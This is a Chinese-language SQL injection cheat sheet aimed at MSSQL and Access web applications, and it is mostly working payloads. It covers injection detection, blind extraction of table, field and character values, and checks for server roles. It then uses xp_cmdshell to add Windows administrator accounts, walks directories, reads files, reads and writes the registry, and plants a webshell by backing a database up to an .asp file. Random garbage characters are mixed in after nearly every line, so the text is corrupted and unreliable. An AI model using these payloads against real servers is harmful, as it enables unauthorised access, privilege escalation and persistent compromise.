1.判断是否有注入;and 1=1 ;and 1=2 iXG>j.w{79
2.初步判断是否是mssql ;and user>0 �fzk�C���I
{l��*�&�l2
3.注入参数是字符'and [查询条件] and ''=' tz�0Ttu=xH
�n� ]6
�0�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' wEH�Akc�)Q
U��g�D�'Bi
5.判断数据库系统 ['}^;Y�?*o
mNnw G);$
;and (select count(*) from sysobjects)>0 mssql \AtwO�����
�Kl46CZs#8
;and (select count(*) from msysobjects)>0 access HM$`z"p5jg
}!��Diai*C
N[
Lz 0�c?
�v]`A�_)[
6.猜数据库 ;and (select Count(*) from [数据库名])>0 \�:��_.N8"
Y#SmZ*zok
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 'wB H��uq
K9�I,Q$&xX
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 p�w<�q?�q%
�[oU+b���(
9.(1)猜字段的ascii值(access) yf�#%)-7(�
M:�:I�E�|h
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �bE`*��Uw4
Xo�xR5ar�j
(2)猜字段的ascii值(mssql) e`�Zg7CaDd
�f5=t*9_-[
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 4M�t�qQq4%
c~L6�fv�S�
10.测试权限结构(mssql) )�QSt7g|OF
��(�/x@�W`
i9EM��i_�%
xv#�j� 593
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- <zDw&�s�2�
NW4
s�'roP
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �2YE]?�!
�
CI,`�R&=xO
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- ev�mEX�<N
wD?=�u\% &
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- |j�aY[_�.@
n;k97>m${x
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �9+�is?P�j
[P&,}o)+E0
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ~4�~�Tcn��
\�'�LC�C�-
;and 1=(select IS_MEMBER('db_owner'));-- �4 _U,-�%/
I_�6` Z� 0
iQ]c�
k�-�
v20�I<!�5w
11.添加mssql和系统的帐户 M%5�$-;6~_
g7���U:A0Z
;exec master.dbo.sp_addlogin username;-- �!NAX�6�m�
;exec master.dbo.sp_password null,username,password;-- :{xN33@6\X
�MM�A@J���
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- J2�rLsNC]0
��=<'iLQb1
;exec master.dbo.xp_cmdshell 'net user username password f�`9��rT�c
�-S�Y:qG3?
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- |nH0�~P#!
rIFC#�Jd�/
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �j3���[OY�
@`y?��\fWh
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- gJ�G�BD9wC
nog�\�,NT�
i{FC1tVeL_
9hs{uxwuEE
12.(1)遍历目录 �Obc�3^pV&
Ae_ E;�[mj
;create table dirs(paths varchar(100), id int) ;gW|qb+#)j
{��O&�liU4
;insert dirs exec master.dbo.xp_dirtree 'c:\' Lj��Q1a�r\
�+81+�4{*�
;and (select top 1 paths from dirs)>0 g/X�=�#!��
�33KPo0g7�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U)/�Ul>dY�
�rD�x],O _
f93X5h�FnF
�'5,,�X�hP
(2)遍历目录 {��kRC!��}
e��"ad�kV
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Z8dN0�AqZ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �]>4�Q�s�
(Nlm�4*{�h
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �'lR�HdD}s
�_T��N$�c
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 &|{�,4V0%A
c�+)|o�!�d
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 .s�R��&9FH
z3jz��p�mz
S�,t�VOxs^
8m[L]6F(-z
13.mssql中的存储过程 s=�~7m�.�m
MJ"Mn^:/��
xp_regenumvalues 注册表根键, 子键 ���"A�1yqK
cf�!k
9x9Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 C�m}UW��X�
&CmkNm��_B
xp_regread 根键,子键,键值名 GN;XB� b]w
=�i5:�*�J�
;exec xp_regread >hL'#�;:f#
�8kc'�|F�\
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 'MQG�R@*�
�;��Kq?*H�
xp_regwrite 根键,子键, 值名, 值类型, 值
D�Pxu3,Y�
BG8)bh�k;/
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0o=)�&%�G
Z%9^6�kdY�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��dVt@�D&
+95�d��z?~
xp_regdeletevalue 根键,子键,值名 %y7�wF�'_Y
ft�qW�3V�W
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 R:�R@s�U��
2P=~�3�g*�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �;��F�(�01
P"~T*Qq-R�
}0nB�'�0|y
�_r5Ild�@n
14.mssql的backup创建webshell �(@o
�/>�T
��}�q�dJ8K
use model LXF%�~^^@d
j6HbJ#]��
create table cmd(str image); 2y7�q
x1$C
446hr�zW>@
insert into cmd(str) values (''); V1>94/�waa
*Z2Q]?:{
i
backup database model to disk='c:\l.asp'; n�kj'A�H"2
8�42��+KLS
2b,�TkG�8K
@Be:�+01�z
15.mssql内置函数 aw"%B-N�\�
/aa;M*Qp��
;and (select @@version)>0 获得Windows的版本号 7%!�K�Atc�
hPpX�B:(-0
;and user_name()='dbo' 判断当前系统的连接用户是不是sa ;k%s�KVP�
HP�dwx
�V�
;and (select user_name())>0 爆当前系统的连接用户 y8S�6ZtA}2
q<uLBaL_]r
;and (select db_name())>0 得到当前连接的数据库 ��<�~X6D?�
+<WT$ddK=5
KR�(ft�G'�
d>98� �E9
16.简洁的webshell BF���[?* b
�S|�4�/C��
use model ~%K(o�u=�2
wX�GF��q3`
create table cmd(str image); |M>k &p,B-
�4H�?�Ma|,
insert into cmd(str) values (''); CPeK0(7Zh�
I3$vw7}5Y�
backup database model to disk='g:\wwwtest\l.asp';
